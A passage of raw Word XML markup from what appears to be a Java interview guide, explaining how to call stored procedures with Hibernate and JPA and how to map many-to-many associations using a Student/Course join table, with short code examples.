          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="566" w:name="_Toc197867780"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to call stored procedures using hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="566"/>
    </w:p>
    <w:p w14:paraId="4F12AD4D" w14:textId="25E764FF" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978"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alling Stored Procedures Using Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F45A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can call stored procedures in Hibernate using either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or </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate's @Query annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Below are the different approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056FF9FA"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64C06">
          <v:rect id="_x0000_i2439" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D5AB49"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Using Hibernate Session.createSQLQuery() Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2718E39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use the createSQLQuery() method to execute stored procedures with Hibernate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DFEA0E"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922D88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8D98AC9"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0CAE1AE6" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4AAB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alling the stored procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A1D49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call my_procedure(?, ?)}";  // Stored procedure with parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1866950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327103E4" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34AF1872"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etting parameters (if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C49A65B"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0, "param1_value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707FBBD6"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1, "param2_value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F55E538" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D47858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Executing the stored procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD9C94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executeUpdate();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0BAF10" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4447E5D5"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154901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2CC400E0"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example, my_procedure is the stored procedure name, and the ? placeholders are used for parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76626EA8"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F66F6">
          <v:rect id="_x0000_i2440" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="393C28B4"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Using @Query Annotation in Hibernate (for Named Queries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F25D0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simpler cases where you are using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within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you can use @Query (in combination with Spring Data JPA or similar frameworks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E7B50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nativeQuery = true, value = "{call my_procedure(:param1, :param2)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B17AA9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oid callStoredProcedure(@Param("param1") String param1, @Param("param2") String param2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F7A09F"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DAA9C">
          <v:rect id="_x0000_i2441" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9B7B8"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Using StoredProcedureQuery in JPA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566A046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JPA (which Hibernate implements), you can use the StoredProcedureQuery to call stored procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C36E4B7"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0F1146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5BA877A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Query storedProcedure = em.createStoredProcedureQuery("my_procedure");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690413E4" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7C0F2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1, String.class, ParameterMode.IN);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5F53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2, String.class, ParameterMode.IN);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A12E5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1, "param1_value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F3EE0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2, "param2_value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16004736" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B897F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execute();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAAC52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In this case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615A74FC"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y_procedure is the stored procedure name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6646BF49"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gisterStoredProcedureParameter() is used to define the parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43254842"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set values for the parameters and execute the stored procedure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0851E5AB"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06E1D7">
          <v:rect id="_x0000_i2442" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E494DB"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042F7732"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Native SQL (createSQLQuery)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For calling stored procedures using native SQL syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFC6047"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Annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used for native queries in Spring Data JPA to execute stored procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C065698"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StoredProcedureQuery</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A JPA interface for calling stored procedures in a more structured way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C649D95" w14:textId="4DABFBA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443" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F957699" w14:textId="1D63346D" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="002A154B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="567" w:name="_Toc197867781"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is Many to many </w:t>
      </w:r>
      <w:r w:rsidR="00AC5794" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>associations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in hibernate</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="567"/>
    </w:p>
    <w:p w14:paraId="0F51D634" w14:textId="414B5851" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570D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ny-to-Many Associations in Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51933EE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exists when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one type are associated with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another type. This type of relationship is typically represented by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in the database, which maps the two entities together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E16F6D"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8F8781">
          <v:rect id="_x0000_i2444" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C68F7"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Many-to-Many Relationships Work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3805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sider two entities, Student and Course, where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EF03FC"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tudent</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can enroll in many </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Courses</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0678C2DA"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Course</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can have many </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Students</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D7D2A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relationship between these two entities is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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBA1A8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oin Table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119790A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ibernate requires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or bridge table) to map this relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E95C6B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join table stores the foreign keys referencing both Student and Course.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F6199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E39DB">
          <v:rect id="_x0000_i2445" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4640F3CC"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pping Many-to-Many Relationship in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D5C48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defin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n Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E2678E"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 Entity (One side of the relationship):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ABA8F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B7E32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Student {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0350DFC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0A67EF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E6256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3D94AC4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0BA1C20A" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579DAD7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57153C3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Table(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B3354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name = "student_course",  // Join table name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A110E2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s = @JoinColumn(name = "student_id"),  // Column for Student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B591B6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verseJoinColumns = @JoinColumn(name = "course_id")  // Column for Course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747D167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DD370C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Course&gt; courses = new HashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33996578" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED67FD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25F32D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D20A6A5"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 Entity (Other side of the relationship):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A601E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3A4AFD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ourse {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFAEE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8894B7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462204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220AFA0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courseName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A26970B" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="557D32D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mappedBy = "courses")  // mappedBy refers to the field in the "Student" class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F139A7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Student&gt; students = new HashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E19FB48" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C9E58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D76528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4864E7"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0E3FCE">
          <v:rect id="_x0000_i2446" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3753A85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It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6D0052"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Specifies the many-to-many relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B21BE9"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Defines the join table that contains two foreign keys: one for the Student and one for the Course.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E5967B"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ppedBy</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In the Course entity, the mappedBy attribute ensures that the relationship is maintained in only one of the entities (here, the Student entity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCAC88C"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B292FB">
          <v:rect id="_x0000_i2447" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7C70DD"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atabase Schema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3302852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62"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="76BD3588" w14:textId="77777777" w:rsidTr="007570DA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02BA41B2"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_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E77030F"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_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="5FE8C78B" w14:textId="77777777" w:rsidTr="007570DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53BBA68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60EF85B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0AEA7DEF" w14:textId="77777777" w:rsidTr="007570DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="003BFD1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1868E37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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="2BA7D380" w14:textId="77777777" w:rsidTr="007570DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60EE02C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25EDB79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2499B6C4" w14:textId="77777777" w:rsidTr="007570DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="606994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4D67DD1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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="380536E6"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D9C86">
          <v:rect id="_x0000_i2448" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B17EA26"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nserting Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7E906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insert data in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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55771FD4"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60CE2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7557F53" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3602760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tudent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1777EE4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 student = new Student();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFDB3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setName("John Doe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CBB519" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42EF47C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Courses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A1E3B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1 = new Course();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA949A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setCourseName("Math 101");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327A8C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2 = new Course();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2261F4F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setCourseName("Science 101");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FEAF06" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8D3B1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ink student with courses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0821C1B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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121279A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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D2D203" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57CFBA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getStudents().add(student);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57221D7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getStudents().add(student);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1C276" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541E0D5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ave entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF2D91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student);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427E0A7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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78642DE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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3642CDDE" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE07F5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2E82D1B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BB4963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A858B">
          <v:rect id="_x0000_i2449" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F3F7C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6F746214"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s when one entity can have multiple instances of another entity and vice versa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE39798"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use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annotation along with </w:t>
      </w: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xml:space="preserve"> to define the join table that connects the two entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3B85A6"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This setup is commonly used in cases like </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
